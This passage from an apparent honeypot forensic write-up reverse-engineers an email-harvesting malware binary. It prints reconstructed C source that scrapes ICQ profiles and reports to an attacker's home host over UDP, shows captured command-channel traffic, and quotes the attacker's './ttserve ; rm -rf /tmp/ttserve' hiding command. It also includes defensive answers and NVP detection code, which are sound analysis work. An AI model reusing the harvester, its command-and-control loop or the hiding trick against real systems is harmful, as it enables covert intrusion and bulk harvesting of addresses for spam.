    80489c3:  89 c0                 mov    %eax,%eax
    80489c5:  83 f8 ff              cmp    $0xffffffff,%eax
    80489c8:  75 0a                 jne    0x80489d4
    80489ca:  b8 ff ff ff ff        mov    $0xffffffff,%eax
    80489cf:  eb 0b                 jmp    0x80489dc
    80489d1:  8d 76 00              lea    0x0(%esi),%esi
    80489d4:  8b 45 fc              mov    0xfffffffc(%ebp),%eax
    80489d7:  eb 03                 jmp    0x80489dc
    80489d9:  8d 76 00              lea    0x0(%esi),%esi
    80489dc:  89 ec                 mov    %ebp,%esp
    80489de:  5d                    pop    %ebp
    80489df:  c3                    ret

In plain C, this looks like:

    int bytes_avail(int sock)
    {
        int res;

        if (ioctl(sock, FIONREAD, &res) == -1)
            return -1;
        return res;
    }

Now it's time to look at the two remaining functions. I will not quote the
disassembly here, only the translated C source. It doesn't look very
pretty, but it's readable. Two global variables seem to be used, one of
which was declared static (it's in the .bss section).
    unsigned long start_uin;            /* 0x0807ad84 */
    static int buf_len;                 /* 0x08080f38 */

    int function1(int uin, char *retbuf)
    {
        int sock, cnt;
        int l3;
        char buffer[1024];

        l3 = 1;

        /* return next UIN if this block was not finished */
        if ((uin <= start_uin + 98) && (start_uin != 0))
            return uin + 1;

        sock = nblk_udp_socket();

        /* this means we have something to send home */
        if (strlen(retbuf) > 3) {
            /* try to send it until confirmation is received or we time
               out. Looks like there is a bug in the handling of buf_len ?! */
            while (l3) {
                cnt = 0;
                retbuf[buf_len++] = '\0';
                while (cnt <= 10) {
                    send_home_message(sock, retbuf, buf_len);
                    sleep(10);
                    cnt++;
                    if (recv_home_message(sock, buffer, 1000) > 0) {
                        if (!strncmp(buffer, "GOT", 3)) {
                            l3 = 0;
                            break;
                        }
                    }
                }
                if (cnt > 10)
                    exit(0);
            }
        }

        /* request a new block of UINs to collect */
        cnt = 0;
        while (cnt <= 10) {
            send_home_message(sock, "GU\n", 3);
            sleep(10);
            cnt++;
            if (recv_home_message(sock, buffer, 1000) > 0) {
                /* maybe we're being asked to shut up */
                if (!strncmp(buffer, "DIE", 3)) {
                    fd_close(sock);
                    exit(0);
                }
                /* ... or we receive new work */
                if (!strncmp(buffer, "DU", 2)) {
                    /* 0x0804de0c, most likely sscanf */
                    sscanf(buffer + 2, "%lu", &start_uin);
                    memset(retbuf, 0, 30000);
                    /* 0x0804ddf4, identified as _IO_sscanf, but it is
                       rather sprintf */
                    sprintf(retbuf, "SE%lu\n", start_uin);
                    buf_len = strlen(retbuf);
                    fd_close(sock);
                    return start_uin;
                }
            }
        }
        fd_close(sock);
        exit(0);
    }

    void function2(int uin, char *retbuf, int retsize)
    {
        struct sockaddr_in saddr;
        int sock, cnt, run, state;
        char buffer[1024];
        char c1, c2;
        time_t req_sent;

        run = 1;
        state = 0;
        c1 = ' ';
        req_sent = 0;

        saddr.sin_addr.s_addr = ip_address("web.icq.com");
        saddr.sin_family = AF_INET;
        saddr.sin_port = htons(80);
        sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (connect(sock, (struct sockaddr *) &saddr,
                    sizeof(struct sockaddr_in)) == -1) {
            close(sock);
            return;
        }
        sleep(1);
        fcntl(sock, F_SETFL, O_NONBLOCK);
        sprintf(buffer,
                "GET /wwp?Uin=%lu HTTP/1.0\r\nHost: web.icq.com\r\n\r\n",
                (unsigned long) uin);
        send(sock, buffer, strlen(buffer), 0);
        req_sent = time(NULL);

        while (run) {
            if (time(NULL) - req_sent > 25)
                run = 0;
            if (!bytes_avail(sock))
                continue;
            cnt = read(sock, &c2, 1);
            if (cnt != 1)
                continue;

            /* states:
               0 - look for '"'
               1 - inside quotes, check if this is a mailto (go to
                   state 2), otherwise go back to state 0
               2 - copy the email address until a quote is found or the
                   buffer runs out */
            if (state == 0) {
                if (c2 == '"')
                    state = 1;
            } else if (state == 1) {
                if ((c1 == '"') && (c2 != 'm')) state = 0;
                if ((c1 == 'm') && (c2 != 'a')) state = 0;
                if ((c1 == 'a') && (c2 != 'i')) state = 0;
                if ((c1 == 'i') && (c2 != 'l')) state = 0;
                if ((c1 == 'l') && (c2 != 't')) state = 0;
                if ((c1 == 't') && (c2 != 'o')) state = 0;
                if ((c1 == 'o') && (c2 != ':')) state = 0;
                /* found "mailto:, go to state 2 */
                if ((c1 == 'o') && (c2 == ':')) state = 2;
            } else if (state == 2) {
                if (buf_len > retsize - 1) {
                    close(sock);
                    sleep(1);
                }
                if (c2 == '"') {
                    retbuf[buf_len++] = '\n';
                    close(sock);
                    sleep(1);
                    return;
                }
                if (isprint(c2))
                    retbuf[buf_len++] = c2;
            }

            /* save last char */
            c1 = c2;
        }
        close(sock);
    }

By now, the purpose of the program is quite clear. It contacts the
attacker's home address over UDP on port 53413 and says hello ("GU"). There
are two possible answers to this greeting: "DIE", which instructs the
program to exit, and "DUxxxxxx", where xxxxxx is a decimal number. The
number following the "DU" string is the start of a block of 100 ICQ user
IDs (UINs) whose profiles will be harvested for email addresses.

function1 is responsible for communicating with the attacker's home machine
and selecting the next ICQ ID to probe. function2 retrieves the profile,
looks for the string '"mailto:' and copies the email address into the
large buffer (30000 bytes) allocated in main(). Email addresses are
separated by newlines. When 100 user IDs have been harvested, the result is
sent home. The buffer looks something like:

    SExxxxxxxx           <---- this is the start of the block
    email1@email.com
    email2@email.com
    ...
    etc

After sending this buffer, the foo program expects a confirmation from the
home machine: a packet containing the "GOT" acknowledgment. Once the
acknowledgment is received, the program sends the "GU" greeting again and
waits for more instructions (DIE or DUxxxxxx).

Let's take a look at the snort log again. First, let's filter out the
connections to the ICQ web servers (205.188.248.25, 205.188.248.57,
205.188.248.89). (03-no-foo-download.log contains all traffic except the
NVP backdoor traffic and the download of the foo file.)

    void:~$ tcpdump -r 03-no-foo-download.log -w 05-no-icq.log host not web.icq.com

Let's examine the communication with the home base:

    void:~$ tcpdump -r 05-no-icq.log -X udp and port 53413
    22:57:55.439307 172.16.183.2.1025 > 11.11.11.11.53413: udp 3
    0x0000   4500 001f 00c9 0000 4011 d6fd ac10 b702        E.......@.......
    0x0010   0b0b 0b0b 0401 d0a5 000b 36d4 4755 0a          ..........6.GU.
    22:57:55.493471 11.11.11.11.53413 > 172.16.183.2.1025: udp 10
    0x0000   4500 0026 0363 0000 3511 df5c 0b0b 0b0b        E..&.c..5..\....
    0x0010   ac10 b702 d0a5 0401 0012 7922 4455 3932        ..........y"DU92
    0x0020   3037 3130 300a                                 07100.

Hmm, only two packets. The first is the "GU\n" greeting from the program to
the home machine. The second comes from the home machine and instructs the
program to start harvesting from ICQ ID 9207100. Looking at the flows to the
ICQ server, we can find all 100 requests, but the UDP packet that reports
home was not found in the snort log. Either it was removed from the log to
obfuscate it, or the program has a bug which I cannot find :-(

4. Answers
----------

4.1. What is the attacker's IP address?

Most likely 216.242.103.2. This is the address the foo program was
downloaded from. It is also the address from which the 'foo' program
expects its instructions and to which it sends its results.

4.2. What is the attacker doing first? What do you think is his/her
motivation for doing this?
First, the attacker checks whether this machine is a nameserver for some
domains. His motivation could be to forge host names, so that they appear
to belong to one of the domains served by this nameserver.

4.3. Why is there some readable text in packets #17-#25 (and some others),
but not in packets #15-#16 (and several others)? What differentiates these
groups of packets from each other?

I assume that the padding in the NVP backdoor traffic is not encrypted, and
that the clear text in those packets is whatever was left in the memory
buffer used to decrypt previous packets.

4.4. What is the purpose of 'foo'? Can you provide more insights about the
internal workings of 'foo'? Do you think that 'foo' was coded by a good
programmer or by an amateur?

Please refer to section 3.2, where a detailed analysis of 'foo' was
performed. The purpose of this program is to harvest the email addresses of
ICQ users. The program was coded by a beginner:

  - there is unnecessarily complex code to daemonize the process;
  - non-blocking I/O is used incorrectly (for instance, the program
    busy-waits for data in function2());
  - the check for an error return value from socket() is wrong;
  - ip_address() is not needed, since gethostbyname() is enough to parse a
    dotted-decimal representation of a host's IP address;
  - etc.

4.5. What is the purpose of './ttserve ; rm -rf /tmp/ttserve' as done by
the attacker?

The attacker does this to hide the existence of the 'foo' binary on the
compromised system. Once ttserve (the downloaded 'foo' program) is
launched, it daemonizes itself and hides from 'ps' by overwriting its
command line. It then appears to be "(nfsiod)" running as user daemon,
i.e. a system process. When the executable file of a running program is
rm'ed, its data is not actually deleted from disk. Only the directory entry
is removed and the inode's link count drops to zero. Since the inode is
still referenced by the running program, the file is removed only when the
program terminates.
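The behaviour described in 4.5 is easy to observe. The sketch below uses an open file descriptor as a stand-in for the running program's reference to its executable; a running process actually keeps its executable mapped, but the effect on the inode is the same. After unlink(), the name is gone and the link count is 0, yet the data can still be read through the descriptor until it is closed. survives_unlink() is a hypothetical helper, and the sketch assumes /tmp is writable.

```c
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns 1 if data written to a temporary file can still be read back
 * through an open descriptor after the file has been unlinked, else 0. */
int survives_unlink(void)
{
    char path[] = "/tmp/unlink-demo-XXXXXX";
    int fd = mkstemp(path);               /* create and open the file */
    if (fd == -1)
        return 0;

    const char msg[] = "still here";
    if (write(fd, msg, sizeof msg) != (ssize_t)sizeof msg || unlink(path) == -1) {
        close(fd);
        return 0;
    }

    struct stat st;
    char back[sizeof msg];
    int ok = access(path, F_OK) == -1                   /* the name is gone   */
          && fstat(fd, &st) == 0 && st.st_nlink == 0    /* no links remain    */
          && lseek(fd, 0, SEEK_SET) == 0
          && read(fd, back, sizeof back) == (ssize_t)sizeof back
          && memcmp(back, msg, sizeof msg) == 0;        /* data still readable */

    close(fd);   /* last reference dropped: the kernel frees the inode now */
    return ok;
}
```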
4.6. How do you think the attacker will use the results of his activity
involving 'foo'?

My first guess was that this activity (collecting the email addresses of
ICQ users) was related to a possible ICQ hack (stealing ICQ accounts). This
cannot be true, because the attacker has no way to tell which UIN a given
email address belongs to. Even though UINs are scanned sequentially, some
UINs are no longer in use. Their profile pages list no email address, so no
line is generated for those UINs in the report packet.

Actually, there are 164 email addresses in those 100 TCP flows to
web.icq.com. Of those, 88 have the form UIN@pager.icq.com (an email-to-ICQ
gateway at icq.com) and 76 are listed as user email addresses. However,
only the first email address is saved, so there is no way this address
(@pager.icq.com) can be related to the real email address.

My best guess is that these email addresses are harvested for spamming
(possibly to sell the lists to spammers?!), nothing more.

Bonus Question:

4.7. If you administer a network, would you have caught such NVP backdoor
communication? If yes, how? If you do not administer a network, what do you
think is the best way to prevent such communication from happening and/or
detect it?

Because of a lack of system administration resources, I wouldn't have
detected the NVP backdoor traffic in a timely manner, since the firewall
logs are only analyzed from time to time. However, the firewall wouldn't
have let this traffic through: we implicitly deny whatever is not
explicitly allowed, which blocks this kind of communication and renders the
backdoor unusable. I believe this is a good policy. It forces an attacker
to use an "open" communication channel, which is much harder to arrange
when the attack (wu-ftpd exploit, installation of the backdoor, etc.) is
automated.
The attacker would have to first look for some means of passing traffic through the firewall and adapt the backdoor server accordingly.
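For the monitoring side, here is a minimal C sketch of the check a sensor could apply to each captured packet. It is the same test as the tcpdump 'proto 11' filter used in section 3.1: it looks at the protocol field (offset 9) of the IPv4 header. is_nvp_packet() and NVP_PROTO are hypothetical names. In practice, the packet filter or IDS rules would do this job rather than hand-written code.

```c
#include <stddef.h>
#include <stdint.h>

#define NVP_PROTO 11   /* IP protocol number abused by the backdoor */

/* Returns 1 if pkt starts with a well-formed IPv4 header whose protocol
 * field is 11 (NVP), 0 otherwise. */
int is_nvp_packet(const uint8_t *pkt, size_t len)
{
    if (len < 20)                              /* shorter than a minimal header */
        return 0;
    if ((pkt[0] >> 4) != 4)                    /* IP version must be 4 */
        return 0;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;  /* header length in bytes */
    if (ihl < 20 || ihl > len)
        return 0;
    return pkt[9] == NVP_PROTO;                /* protocol field */
}
```

Fed the header of the "GU" packet shown in section 3.2 (protocol 0x11, UDP), it returns 0. The same header with the protocol byte set to 11 returns 1.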